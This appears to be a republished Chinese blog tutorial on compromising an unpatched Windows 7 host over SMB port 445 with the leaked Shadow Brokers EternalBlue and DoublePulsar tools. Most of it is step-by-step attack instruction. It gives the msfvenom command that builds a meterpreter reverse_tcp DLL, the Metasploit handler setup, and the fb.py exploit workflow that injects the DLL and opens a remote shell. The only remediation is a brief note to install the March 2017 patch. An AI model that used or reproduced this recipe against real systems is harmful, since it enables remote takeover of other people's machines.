通过默认共享入侵系统

1概述

默认共享可以干什么呢?除了通过默认共享来查看别人电脑资料,还有更厉害的直接提权。近年来罕见的高危漏洞来了,如果不安装最新微软2017年3月份的补丁的话,攻击者可以通过远程入侵445端口来获取对方的系统权限。

工具用的是Shadow Brokers组织公布的神器,而且肯定是已经被默默使用了很久了,简单的说就是如果Windows的默认共享445端口是对外可以被访问的,那么别人就可以远程登录你的系统了。

2攻击演示

测试机器:

攻击方:win200332位

目标:win7 64位

1https://github.com/misterch0c/shadowbroker

入口文件是fb.py,需要python环境。

注意这里原先是在win7 64位上面准备攻击,但是程序有报错需要在32位上面运行。

2.1准备工作

安装python环境,缺少对应库的话就再自行安装。

测试目的端口是否通:

确定可以尝试攻击。

2.1.1 msf平台

然后先用msf平台生成一个dll木马,后面让对方加载这个dll木马之后就可以控制对方了。

2msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=公网IP LPORT=4444 -f dll > go.dll

保存好生成的go.dll备用,到时候需要通过smb漏洞上传到目标机器。

准备好接收shell的4444端口,注意IPTABLES需要提前开放此端口:

3use exploit/multi/handler

4set LHOST公网IP

5set LPORT 4444

6set PAYLOADwindows/x64/meterpreter/reverse_tcp

7exploit

通过msfconsole命令进入shell的监听界面

注意,这里有个大坑,msfvenom生成的dll和set PAYLOAD的要对应,之前有个没有加x64,有个又有,然后一直反弹shell不成功。

监听好shell的反弹端口4444之后来进行具体入侵操作。

2.2方程式工具

下载地址

8https://github.com/misterch0c/shadowbroker

修改fb.py,不然运行起来会报错,修改后的diff如下:

就是在原先的fb.py里面注释几行额外的目录加载。

然后正式进行攻击测试,下面很多步骤可以默认选回车即可。

分别填写目的IP和本机的IP,然后可以默认回车:

2.2.1 Eternalblue模块

然后可以开始利用模块了:

9use Eternalblue

然后会有目标信息确认:

最后执行:

成功的话会有success显示:

2.2.2Doublepulsar模块

然后是目标机器加载我们的dll木马。

这里有些选项,比较容易辨别:

最后Execute Plugin,回车:

然后可以可以看到之前的监听shell有响应:

成功建立连接,再敲shell就成功进入对方机器的cmd终端了。

注意,实际操作中对方机器有一定机率会有报错提示,然后会自动重启。

3漏洞修复

漏洞修复比较简单,直接安装最新补丁即可,具体的就是这个补丁:

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181102G1RAE000?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券